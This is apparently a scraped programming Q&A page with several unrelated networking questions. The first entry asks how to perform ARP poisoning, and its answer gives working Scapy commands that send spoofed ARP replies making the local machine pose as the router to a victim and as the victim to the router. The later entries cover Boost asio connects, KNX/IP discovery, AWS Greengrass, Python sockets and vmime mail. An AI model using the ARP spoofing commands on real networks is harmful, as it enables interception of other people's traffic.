I am trying to use the "ip is at macadress" option but cant figure how to do so... here is my code atm:
from scapy.all import *
victim = "192.168.5.51"
spoof = "192.168.5.46"
op=2
mac = "88:00:2e:00:87:00"
while True:
arp = ARP(op=op, psrc=spoof, pdst=victim, hwdst=mac)
send(arp)
What I am looking for is to send the victim ip a ARP packet with the the default gateway ip/mac and send the gateway the ip/mac of the attacker
The attack is arp poisonning
It's a bit unclear what you're trying to achieve, but if all that you're interested in is creating an ARP reply of the form "192.168.5.51 is at 00:00:00:00:00:00", in which the values of all other fields are irrelevant, then this should suffice:
send(ARP(op=ARP.is_at, psrc='192.168.5.51', hwsrc='00:00:00:00:00:00'))
EDIT:
This sends the victim an ARP reply packet with the local machine masquerading as the router:
send(ARP(op=ARP.is_at, psrc=router_ip, hwdst=victim_mac, pdst=victim_ip))
This sends the router an ARP reply packet with the local machine masquerading as the victim:
send(ARP(op=ARP.is_at, psrc=victim_ip, hwdst=router_mac, pdst=router_ip))
In both of these packets, the hwsrc field is filled by default with the local machine's MAC address.
Related
Using Boost v1.74:
int main()
{
auto ctx = boost::asio::io_context{};
auto socket = boost::asio::ip::tcp::socket{ctx};
auto ep = boost::asio::ip::tcp::endpoint{
boost::asio::ip::make_address_v4("192.168.0.52"),
80};
boost::asio::connect(socket, std::array{std::move(ep)});
std::cout << "Success!" << std::endl;
}
The IP address of my machine on my local network is 192.168.0.31/24, and so trying to connect to a non-existent address in the same subnet with the above code gives:
10:24:55: Starting /home/cmannett85/workspace/build-scratch-Desktop-Debug/scratch ...
terminate called after throwing an instance of 'boost::wrapexcept<boost::system::system_error>'
what(): connect: No route to host
10:24:59: The program has unexpectedly finished.
This is all expected. If I change the bottom octet of the subnet in the address (e.g. 192.168.1.52), then the app just waits for a few minutes - presumably because it sent messages to any routers to see if they own the requested subnet. There aren't any routers on my network, so it eventually times out:
10:27:39: Starting /home/cmannett85/workspace/build-scratch-Desktop-Debug/scratch ...
terminate called after throwing an instance of 'boost::wrapexcept<boost::system::system_error>'
what(): connect: Connection timed out
10:29:49: The program has unexpectedly finished.
Again, as expected. If I change the next octet (e.g. 192.167.0.52) instead, I would expect this to behave exactly the same as it is an equally unknown subnet as the previous. But it suceeds!
10:31:22: Starting /home/cmannett85/workspace/build-scratch-Desktop-Debug/scratch ...
Success!
This address is definitely not on my network:
$ ping 192.167.0.52
PING 192.167.0.52 (192.167.0.52) 56(84) bytes of data.
^C
--- 192.167.0.52 ping statistics ---
17 packets transmitted, 0 received, 100% packet loss, time 16368ms
So why is the code reporting that it is connected? And why is changing the second octet different to the third?
Any IP address of the form 192.168.xx.xx is a non-internet-routable network. This means no internet routers will route it. So the only way packets get routed off your subnet is if you configure a route on your own router or host. 192.167.xx.xx is an internet routable network, Presumable there is a host out there on the internet that uses the address you specified. So if you can connect your host to the internet, some internet router will get your packet to the address specified.
It's something related to my VPN. I didn't think it was relevant as the tunnel address is 10.17.0.60/16, but disabling it makes the above code work as expected.
Thanks to a suggestion by #dewaffled, Curl is showing that there is something on the otherside of this connection that is completing the TCP handshake, but after a timeout of a few minutes closes the connection.
$ curl -v http://192.167.0.52
* Trying 192.167.0.52:80...
* Connected to 192.167.0.52 (192.167.0.52) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.167.0.52
> User-Agent: curl/7.74.0
> Accept: */*
>
* Recv failure: Connection reset by peer
* Closing connection 0
curl: (56) Recv failure: Connection reset by peer
I know nothing about how VPNs work, but I suspect this is an implementation detail of my particular provider. Hopefully this 'answer' will limit confusion for anyone else!
I wrote a small protocol stack to connect to KNX/IP routers. The mechanism is as follows:
Discovery_Channel: For discovery the client sends out an UDP/IP packet to multicast address 224.0.23.12. KNX/IP routers listen to this multicast address and reply. The KNX/IP router can potentially be connected to multiple KNX media, so the answer contains a list of services with IP addresses and port, the client can connect to.
Communication_Channel: The discovered services from all KNX/IP routers are presented to the user to select which service a connection should be made to.
The problem is that the answer from the KNX/IP routers sometimes doesn't contain a valid IP address, but just 0.0.0.0. In this case I need to take the IP address from where the packet came from. But how can I get this with (non-boost version of) asio?
My code looks like this:
/** client socket */
asio::ip::udp::socket m_socket;
/** search request */
void search_request(
const IP_Host_Protocol_Address_Information & remote_discovery_endpoint = IP_Host_Protocol_Address_Information({224, 0, 23, 12}, Port_Number),
const std::chrono::seconds search_timeout = SEARCH_TIMEOUT);
/** search response initiator */
void Discovery_Channel::async_receive_response() {
/* prepare a buffer */
m_response_data.resize(256);
/* async receive */
m_socket.async_receive(
asio::buffer(m_response_data),
std::bind(&Discovery_Channel::response_received, this, std::placeholders::_1, std::placeholders::_2));
}
/** response received handler */
void Discovery_Channel::response_received(const std::error_code & error, std::size_t bytes_transferred) {
// here the answer provided in m_response_data gets interpreted.
// #todo how to get the IP address of the sender?
/* start initiators */
async_receive_response();
}
So how can I retrieve the IP address of the sender in the Discovery_Channel::response_received method? I basically only have the packet data in m_response_data available.
On datagram sockets you can (should, likely) use async_receive_from.
It takes a reference to an endpoint variable that will be set to the remote endpoint on success.
I'm running several Greengrass Cores and they send Data to a MQTT Stream.
I deployed a Lambda on GGC reading the SerialPort coming in and push it to the Stream.
But now I want to check which device is sending the Data - I tried this one to check out the hostname
import socket
host = socket.gethostname()
but the core sends the value "sandbox" so i think the lambda isn't authorized to read the host name.
The SDK has no Documentation for this:
https://github.com/aws/aws-greengrass-core-sdk-python
I want to push the data to a mqqt stream like this:
response = client.publish(
topic='customer/events/{DEVICE-ID or UID or ARN}/',
payload=jsonData.encode())
I found something useful in another AWS Python Example - ThingNames are registered in the System Env so you can import OS and get the ThingName like this:
import os
device = os.environ['AWS_IOT_THING_NAME']
I have a web proxy that starts a TCP listener socket that accepts connections from clients. The listener accepts connections via:
clientConnection, clientAddress = listenerSocket.accept()
and then a new thread handles the client connection from there.
To mock a client connection, I am using telnet to connect to the proxy and issue commands. The proxy needs to receive data from telnet and I need to make sure that I receive all of it. To achieve this, I am doing the following:
while True:
requestBytes = clientConnection.recv(1024)
if not requestBytes:
break
requestBuffer += requestBytes
The proxy then decodes the bytes and does some things with them that takes a little bit of time, and then has to send a response back to the same client. However, when using the above code the connection with clientConnection gets closed long before I can process the bytes and respond.
Here's what I don't understand, when I use the following instead:
while True:
requestBytes = clientConnection.recv(1024)
requestBuffer += requestBytes
break
It works just fine and the clientConnection remains intact. This obviously has a problem if I receive more than 1024 bytes, but the clientConnection does not get closed.
More specifically, the error occurs after I have a response to send to the client and call:
clientConnection.sendall(response)
clientConnection.shutdown(1)
clientConnection.close()
The line clientConnection.shutdown(1) throws the error:
[Errno 107] Transport endpoint is not connected
which is confusing because somehow it was able to still call sendall on the previous line. Note that I did not actually receive anything on the client side.
I am sure that the connection is not getting closed elsewhere in the code. What exactly is happening here and what is the best way to do something like recvall and keep the clientConnection open?
I send mail from vmime using the following code:
vmime::string urlString;
urlString="smtp://outgoing.verizon.net";
vmime::utility::url url(urlString);
vmime::ref <vmime::net::transport> tr =
g_session->getTransport(url,vmime::create <interactiveAuthenticator>());
// You can also set some properties (see example7 to know the properties
// available for each service). For example, for SMTP:
tr->setProperty("options.need-authentication", true);
tr->setProperty("auth.username", userName);
tr->setProperty("auth.password", password);
fromString=userName+"#verizon.net";
vmime::mailbox from(fromString);
vmime::mailboxList to;
toString = toUserName+"#verizon.net";
to.appendMailbox(vmime::create <vmime::mailbox>(toString));
std::ostringstream data;
data<<subjectId;
// Connect to server
tr->connect();
// Send the message
vmime::string msgData = data.str();
vmime::utility::inputStreamStringAdapter vis(msgData);
tr->send(from, to, vis, msgData.length());
logMsg(DEBUG,2,"Thread Id: %ld,Sent the data in the transaction",pthread_self());
I see that the sent data is succesful from the log.
But when i connect to the box[to which the mail was sent] and check the inbox, i see 0 mails to that inbox.
There is no excepton or error from vmime.
when i connect to the web version of the mail box.Iam unable to see any transactions is sent box, even for the succesful mails.Can anyone help how i can see the mails sent in the sent box?
Thanks in advance.
use any sniffer to catch SMTP traffic from your host. if everything looks good (i.e. SMTP session correct), then it's not a problem of your host, but remote MTA (make sure your email wasn't detected as SPAM & etc)